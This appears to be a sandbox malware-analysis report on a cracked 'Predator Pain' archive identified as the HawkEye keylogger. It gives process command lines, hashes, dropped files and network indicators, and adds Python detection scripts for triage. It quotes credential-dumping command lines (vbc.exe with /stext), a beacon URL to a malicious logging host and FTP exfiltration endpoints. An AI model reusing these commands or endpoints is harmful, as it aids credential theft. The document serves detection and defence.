File name:

Predator Pain v13 released 3.1.2014 - Cracked.rar

Full analysis: https://app.any.run/tasks/59a7ccb7-4803-4997-a31b-8cf409094025
Verdict: Malicious activity
Threats:

HawkEye is a trojan and keylogger used to steal private information such as passwords and login credentials. It is often installed bundled with other malware, and it carries evasion features aimed at defeating detection and analysis.

Analysis date: July 29, 2020, 23:22:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
keylogger
hawkeye
evasion
trojan
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

4C7B97192C4CC26D61773CF7CD9FF6A0

SHA1:

A63CB5C1E88F5078549E71D9804CCF20F9449653

SHA256:

E6BA3386C042F21DACB6B5D0E09D03660620C62FF82874CEDA695150E9B59B57

SSDEEP:

24576:+CQXE+2T6dOYjCdKlpeWscXqk0+GUzEK95+8whn80+E0OBCxQb:+oZwCdKloWPqkjJEKI0OBCQb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predator_v14 Cracked.exe (PID: 928)
      • Predator_v13 Cracked.exe (PID: 3912)
      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)
      • Predator_v14 Cracked.exe (PID: 3872)
      • Predator_v13 Cracked.exe (PID: 2612)
    • HAWKEYE was detected

      • Predator_v14 Cracked.exe (PID: 928)
    • Changes the autorun value in the registry

      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)
    • Actions look like stealing of personal data

      • vbc.exe (PID: 324)
      • vbc.exe (PID: 3804)
  • SUSPICIOUS

    • Creates files in the user directory

      • EBFile_1.exe (PID: 3896)
      • Predator_v14 Cracked.exe (PID: 928)
    • Checks for external IP

      • Predator_v14 Cracked.exe (PID: 928)
    • Executable content was dropped or overwritten

      • Predator_v14 Cracked.exe (PID: 928)
      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)
      • WinRAR.exe (PID: 1772)
    • Starts itself from another location

      • EBFile_1.exe (PID: 3896)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • WinRAR.exe (PID: 1772)
    • Executes scripts

      • Predator_v14 Cracked.exe (PID: 928)
    • Loads DLL from Mozilla Firefox

      • vbc.exe (PID: 3804)
  • INFO

    • Manual execution by user

      • Predator_v14 Cracked.exe (PID: 928)
      • Predator_v13 Cracked.exe (PID: 3912)
      • Predator_v14 Cracked.exe (PID: 3872)
      • Predator_v13 Cracked.exe (PID: 2612)
      • taskmgr.exe (PID: 2160)
    • Dropped object may contain Bitcoin addresses

      • Predator_v14 Cracked.exe (PID: 928)
      • Chrome32.exe (PID: 3432)
      • EBFile_1.exe (PID: 3896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes
45
Monitored processes
10
Malicious processes
7
Suspicious processes
0

Behavior graph

Process tree reconstructed from the parent-process field of the Process information section below; #HAWKEYE marks the process the HawkEye signature fired on, and the "drops and starts" edges come from the Dropped files list.

explorer.exe
  WinRAR.exe (PID 1772): extracts the archive, writes Predator_v14 Cracked.exe, Mono.Cecil.dll, Pin.exe, loader.log, desktop.ini
  Predator_v13 Cracked.exe (PID 3912): manual execution by user
  Predator_v13 Cracked.exe (PID 2612): manual execution by user
  Predator_v14 Cracked.exe (PID 928): manual execution by user, #HAWKEYE
    vbc.exe (PID 324): /stext holdermail.txt
    vbc.exe (PID 3804): /stext holderwb.txt
    EBFile_1.exe (PID 3896): dropped and started by PID 928
      Chrome32.exe (PID 3432): dropped and started by EBFile_1.exe; drops AcroRd32.exe
  Predator_v14 Cracked.exe (PID 3872): manual execution by user
  taskmgr.exe (PID 2160): manual execution by user, no indicators

Process information

One entry per monitored process: PID, command line (CMD), image path and parent process, followed by the image metadata and the first loaded modules.
PID: 324
CMD: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holdermail.txt"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Parent process: Predator_v14 Cracked.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 928
CMD: "C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe"
Path: C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Microsoft
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v14 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1772
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predator Pain v13 released 3.1.2014 - Cracked.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 2160
CMD: "C:\Windows\system32\taskmgr.exe" /4
Path: C:\Windows\system32\taskmgr.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\systemroot\system32\ntdll.dll
PID: 2612
CMD: "C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe"
Path: C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe
Parent process: explorer.exe
User:
admin
Company:
Predator Inc.
Integrity Level:
MEDIUM
Description:
Predator Logger
Exit code:
0
Version:
13.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v13 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3432
CMD: "C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe" C:\Users\admin\AppData\Local\Temp\EBFile_1.exe
Path: C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe
Parent process: EBFile_1.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Adobe Reader
Exit code:
0
Version:
11.0.10.32
Modules
Images
c:\users\admin\appdata\local\google (x86)\chrome32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3804
CMD: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holderwb.txt"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Parent process: Predator_v14 Cracked.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 3872
CMD: "C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe"
Path: C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Microsoft
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v14 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3896
CMD: "C:\Users\admin\AppData\Local\Temp\EBFile_1.exe"
Path: C:\Users\admin\AppData\Local\Temp\EBFile_1.exe
Parent process: Predator_v14 Cracked.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Adobe Reader
Exit code:
0
Version:
11.0.10.32
Modules
Images
c:\users\admin\appdata\local\temp\ebfile_1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3912
CMD: "C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe"
Path: C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe
Parent process: explorer.exe
User:
admin
Company:
Predator Inc.
Integrity Level:
MEDIUM
Description:
Predator Logger
Exit code:
0
Version:
13.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v13 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
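The two vbc.exe entries above are the most useful detection handle in this report. vbc.exe is the VB.NET command-line compiler and has no /stext switch; "/stext <file>" is the save-to-text switch of the NirSoft password-recovery utilities, and HawkEye / Predator Pain is known to run those utilities inside a hollowed vbc.exe, with holdermail.txt (mail-client credentials) and holderwb.txt (browser credentials) as the output names. The "Loads DLL from Mozilla Firefox" indicator on PID 3804 fits the browser pass. The script below is an added example, not code from the report or from the sample: it encodes that heuristic plus two others visible in the same table (an executable in a vendor-looking "(x86)" folder under AppData, and a PE description such as "Adobe Reader" on an image outside Program Files) and runs them over records constructed from the table. The record fields, the list of hollowing hosts, the list of masquerade descriptions and the finding texts are assumptions of the example.

```python
"""Process-tree heuristics for HawkEye / Predator Pain style credential theft.

Added example, not code from the ANY.RUN report or from the analysed sample.
Heuristics (all drawn from the Process information table):
  1. A known hollowing host (vbc.exe, RegAsm.exe, ...) started with a NirSoft
     save switch such as /stext <file>; the real compiler has no such switch.
  2. An executable running from a vendor-looking "<Vendor> (x86)" folder
     under %LOCALAPPDATA% or %APPDATA%.
  3. A PE description claiming a well-known product (e.g. "Adobe Reader")
     on an image that is not under Program Files.
Record field names, the host/description lists and the finding texts are
assumptions of this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    cmd: str
    path: str
    parent: str
    description: str = ""


# Constructed from the report's Process information section (6 of the 10 entries).
PROCESSES = [
    Proc(928, r'"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe"',
         r"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe",
         "explorer.exe", "Microsoft"),
    Proc(324, r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holdermail.txt"',
         r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
         "Predator_v14 Cracked.exe", "Visual Basic Command Line Compiler"),
    Proc(3804, r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holderwb.txt"',
         r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
         "Predator_v14 Cracked.exe", "Visual Basic Command Line Compiler"),
    Proc(3896, r'"C:\Users\admin\AppData\Local\Temp\EBFile_1.exe"',
         r"C:\Users\admin\AppData\Local\Temp\EBFile_1.exe",
         "Predator_v14 Cracked.exe", "Adobe Reader"),
    Proc(3432, r'"C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe" C:\Users\admin\AppData\Local\Temp\EBFile_1.exe',
         r"C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe",
         "EBFile_1.exe", "Adobe Reader"),
    Proc(1772, r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predator Pain v13 released 3.1.2014 - Cracked.rar"',
         r"C:\Program Files\WinRAR\WinRAR.exe",
         "explorer.exe", "WinRAR archiver"),
]

# .NET framework binaries this family is known to hollow (assumed list).
HOLLOW_HOSTS = {"vbc.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}
# NirSoft save-to-file switches: /stext, /shtml, /sverhtml, /sxml, /scomma, /stab
NIRSOFT_SAVE = re.compile(r'(?i)(?<![\w/])/s(?:text|html|verhtml|xml|comma|tab)\s+(?:"([^"]+)"|(\S+))')
# "<Vendor> (x86)" folder directly under AppData\Local or AppData\Roaming
FAKE_VENDOR_DIR = re.compile(r"(?i)\\AppData\\(?:Local|Roaming)\\[^\\]+ \(x86\)\\")
PROGRAM_FILES = re.compile(r"(?i)^[A-Z]:\\Program Files(?: \(x86\))?\\")
# Product descriptions whose real binaries live under Program Files (assumed list).
MASQUERADE_DESCRIPTIONS = {"adobe reader", "google chrome", "mozilla firefox"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def nirsoft_output(cmd: str) -> str | None:
    """Path given to a NirSoft save switch, or None if the command line has none."""
    m = NIRSOFT_SAVE.search(cmd)
    return (m.group(1) or m.group(2)) if m else None


def check(proc: Proc) -> list[str]:
    findings = []
    out = nirsoft_output(proc.cmd)
    if image_name(proc.path) in HOLLOW_HOSTS and out:
        findings.append(f"hollowing host with NirSoft save switch, output {out}")
    if FAKE_VENDOR_DIR.search(proc.path):
        findings.append("executable in vendor-looking '(x86)' folder under AppData")
    if proc.description.lower() in MASQUERADE_DESCRIPTIONS and not PROGRAM_FILES.match(proc.path):
        findings.append(f"description '{proc.description}' on image outside Program Files")
    return findings


def triage_processes(procs: list[Proc]) -> dict[int, list[str]]:
    """PID -> findings, for processes with at least one finding."""
    return {p.pid: f for p in procs if (f := check(p))}


def credential_dump_paths(procs: list[Proc]) -> list[str]:
    """Files the recovery tools were told to write; pull these from the sandbox."""
    return [out for p in procs
            if image_name(p.path) in HOLLOW_HOSTS and (out := nirsoft_output(p.cmd))]


if __name__ == "__main__":
    for pid, findings in triage_processes(PROCESSES).items():
        for f in findings:
            print(f"PID {pid}: {f}")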
Total events
1 362
Read events
1 308
Write events
54
Delete events
0

Modification events

The registry writes listed in this excerpt are all WinRAR's own interface and history settings; the autorun-value writes attributed above to EBFile_1.exe (PID 3896) and Chrome32.exe (PID 3432) are not included in this excerpt.

(PID) Process | Operation | Key | Name | Value
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | (blank)
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | (blank)
(1772) WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E | LanguageList | en-US
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\Predator Pain v13 released 3.1.2014 - Cracked.rar
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin | Placement | 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
(1772) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General | LastFolder | C:\Users\admin\AppData\Local\Temp
Executable files
9
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

One line per file: PID, process, filename, type; MD5/SHA256 where the report lists them.

PID 324, vbc.exe: C:\Users\admin\AppData\Local\Temp\holdermail.txt (type and hashes not listed)
PID 3804, vbc.exe: C:\Users\admin\AppData\Local\Temp\holderwb.txt (type and hashes not listed)
PID 1772, WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe, executable (hashes not listed)
PID 1772, WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\desktop.ini, ini (hashes not listed)
PID 1772, WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Mono.Cecil.dll, executable
  MD5: FD7EA8C171B3958910773B0351997482
  SHA256: A6603571C984C2E5C768C146AF4188AFEB3FA825A8D86FC9D7A9419ABD3B549E
PID 1772, WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\loader.log, text
  MD5: D1DA819FF2A21A4547A842DDD02B8832
  SHA256: 63F796057F401138489694CB52A5A63F65646A6FE58DD4AA280C3CAB8D8E2F86
PID 1772, WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Pin.exe, executable
  MD5: 6D137F98C7E10DC7DE04F9218CC290B1
  SHA256: A3B139B466C4CD7DCD23C69FD2341D0F10C6041812E8BEB8C4E3760310ADDE7A
PID 928, Predator_v14 Cracked.exe: C:\Users\admin\AppData\Local\Temp\EBFile_1.exe, executable (hashes not listed)
PID 3896, EBFile_1.exe: C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe, executable (hashes not listed)
PID 3432, Chrome32.exe: C:\Users\admin\AppData\Roaming\Adobe (x86)\AcroRd32.exe, executable (hashes not listed)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
6
Threats
7

HTTP requests

PID 928, Predator_v14 Cracked.exe
  GET http://whatismyipaddress.com/
  HTTP code 301, 104.16.154.36:80, CN US, reputation: shared

PID 3912, Predator_v13 Cracked.exe
  GET http://ww25.deceptiveengineering.com/path/logs.php?fname=PLogger_v13_Test.txt&data=%5BPLogger%20v.13%5D%20Your%20PHP%20has%20been%20verified,%20you%20may%20delete%20this%20file%20now.&subid1=20200730-0923-189e-bcef-3267f48b9346
  HTTP code 200, 199.59.242.153:80, CN US, type html, size 3.93 Kb, reputation: malicious

Connections

PID | Process | IP:port | Domain | ASN | CN | Reputation
928 | Predator_v14 Cracked.exe | 104.16.154.36:80 | whatismyipaddress.com | Cloudflare Inc | US | shared
928 | Predator_v14 Cracked.exe | 104.16.154.36:443 | whatismyipaddress.com | Cloudflare Inc | US | shared
3912 | Predator_v13 Cracked.exe | 199.59.242.153:80 | ww25.deceptiveengineering.com | Bodis, LLC | US | malicious
928 | Predator_v14 Cracked.exe | 145.14.144.10:21 | files.000webhost.com | Hostinger International Limited | US | malicious
3912 | Predator_v13 Cracked.exe | 70.32.1.32:80 | www.deceptiveengineering.com | GigeNET | US | malicious
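Three things in the HTTP and connection lists above deserve a second look: the logs.php request from Predator_v13 Cracked.exe is the builder's "test PHP logger" beacon, and the URL-encoded data parameter decodes to "[PLogger v.13] Your PHP has been verified, you may delete this file now."; the 200 response came from the ww25 host at Bodis, LLC, a domain-parking provider, so the beacon most likely landed on a parking page rather than a live panel. Predator_v14 Cracked.exe (PID 928) checks its external IP at whatismyipaddress.com, which is what the PTsecurity HawkEye / Predator Pain "IP Chck" signature below keys on, and then opens TCP/21 to files.000webhost.com, matching this family's FTP log-delivery option. The script below is an added example, not code from the report or from the sample: it decodes the beacon and applies the two connection checks to records constructed from the tables above. The record fields and the lookup-service, browser and FTP-port lists are assumptions of the example.

```python
"""Network triage for the report's HTTP requests and Connections lists.

Added example, not code from the ANY.RUN report or from the sample. It
  * decodes a PLogger-style "logs.php" beacon query so the fields the PHP
    panel would receive (fname, data, subid1) can be read in clear;
  * flags non-browser processes contacting external-IP lookup services;
  * flags processes opening TCP/21, this family's FTP log-delivery path.
Record field names and the lookup-service / browser / port lists are
assumptions of this example.
"""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass(frozen=True)
class HttpReq:
    pid: int
    process: str
    method: str
    status: int
    url: str


@dataclass(frozen=True)
class Conn:
    pid: int
    process: str
    ip: str
    port: int
    domain: str


# Constructed from the report's HTTP requests section.
HTTP_REQUESTS = [
    HttpReq(928, "Predator_v14 Cracked.exe", "GET", 301, "http://whatismyipaddress.com/"),
    HttpReq(3912, "Predator_v13 Cracked.exe", "GET", 200,
            "http://ww25.deceptiveengineering.com/path/logs.php?fname=PLogger_v13_Test.txt"
            "&data=%5BPLogger%20v.13%5D%20Your%20PHP%20has%20been%20verified,"
            "%20you%20may%20delete%20this%20file%20now."
            "&subid1=20200730-0923-189e-bcef-3267f48b9346"),
]

# Constructed from the report's Connections section.
CONNECTIONS = [
    Conn(928, "Predator_v14 Cracked.exe", "104.16.154.36", 80, "whatismyipaddress.com"),
    Conn(928, "Predator_v14 Cracked.exe", "104.16.154.36", 443, "whatismyipaddress.com"),
    Conn(3912, "Predator_v13 Cracked.exe", "199.59.242.153", 80, "ww25.deceptiveengineering.com"),
    Conn(928, "Predator_v14 Cracked.exe", "145.14.144.10", 21, "files.000webhost.com"),
    Conn(3912, "Predator_v13 Cracked.exe", "70.32.1.32", 80, "www.deceptiveengineering.com"),
]

# Assumed lists; extend from your own proxy/DNS telemetry.
IP_LOOKUP_SERVICES = {"whatismyipaddress.com", "checkip.dyndns.org", "api.ipify.org", "icanhazip.com"}
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}
FTP_PORTS = {21}


def decode_beacon(url: str) -> dict[str, str] | None:
    """Decoded query fields of a logs.php-style beacon, or None if url is not one."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("logs.php"):
        return None
    # parse_qs percent-decodes the values, so "%5BPLogger%20v.13%5D" becomes "[PLogger v.13]".
    return {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}


def external_ip_checks(conns: list[Conn]) -> list[Conn]:
    """Connections to IP-lookup services from anything that is not a browser."""
    return [c for c in conns
            if c.domain.lower() in IP_LOOKUP_SERVICES and c.process.lower() not in BROWSERS]


def ftp_exfil_candidates(conns: list[Conn]) -> list[Conn]:
    return [c for c in conns if c.port in FTP_PORTS]


def contacted_hosts(conns: list[Conn]) -> dict[str, list[int]]:
    """Domain -> sorted ports, the shape most blocklist tooling wants."""
    hosts: dict[str, set[int]] = {}
    for c in conns:
        hosts.setdefault(c.domain, set()).add(c.port)
    return {d: sorted(p) for d, p in hosts.items()}


def triage_network(http: list[HttpReq], conns: list[Conn]) -> dict:
    return {
        "beacons": {r.pid: b for r in http if (b := decode_beacon(r.url))},
        "ip_checks": external_ip_checks(conns),
        "ftp": ftp_exfil_candidates(conns),
        "hosts": contacted_hosts(conns),
    }


if __name__ == "__main__":
    summary = triage_network(HTTP_REQUESTS, CONNECTIONS)
    for pid, fields in summary["beacons"].items():
        print(f"PID {pid} beacon data: {fields['data']}")
    for c in summary["ip_checks"]:
        print(f"PID {c.pid} external IP check via {c.domain}:{c.port}")
    for c in summary["ftp"]:
        print(f"PID {c.pid} FTP to {c.domain} ({c.ip})")
```

The 301 on the whatismyipaddress.com request followed by a 443 connection to the same host is the plain-HTTP lookup being redirected to HTTPS; the lookup itself is harmless, which is why the ET POLICY alert below is classed as a privacy violation rather than a trojan hit, and why the process name, not the destination, is what makes it worth a rule.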

DNS requests

Domain | IP | Reputation
whatismyipaddress.com | 104.16.154.36, 104.16.155.36 | shared
files.000webhost.com | 145.14.144.10 | malicious
www.deceptiveengineering.com | 70.32.1.32 | malicious
ww25.deceptiveengineering.com | 199.59.242.153 | malicious
dns.msftncsi.com (Windows network connectivity check, background traffic) | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
928 | Predator_v14 Cracked.exe | Potential Corporate Privacy Violation | ET POLICY Known External IP Lookup Service Domain in SNI
928 | Predator_v14 Cracked.exe | A Network Trojan was detected | SPYWARE [PTsecurity] HawkEye / Predator Pain (IP Chck)
928 | Predator_v14 Cracked.exe | Potential Corporate Privacy Violation | ET POLICY Known External IP Lookup Service Domain in SNI
928 | Predator_v14 Cracked.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction
928 | Predator_v14 Cracked.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info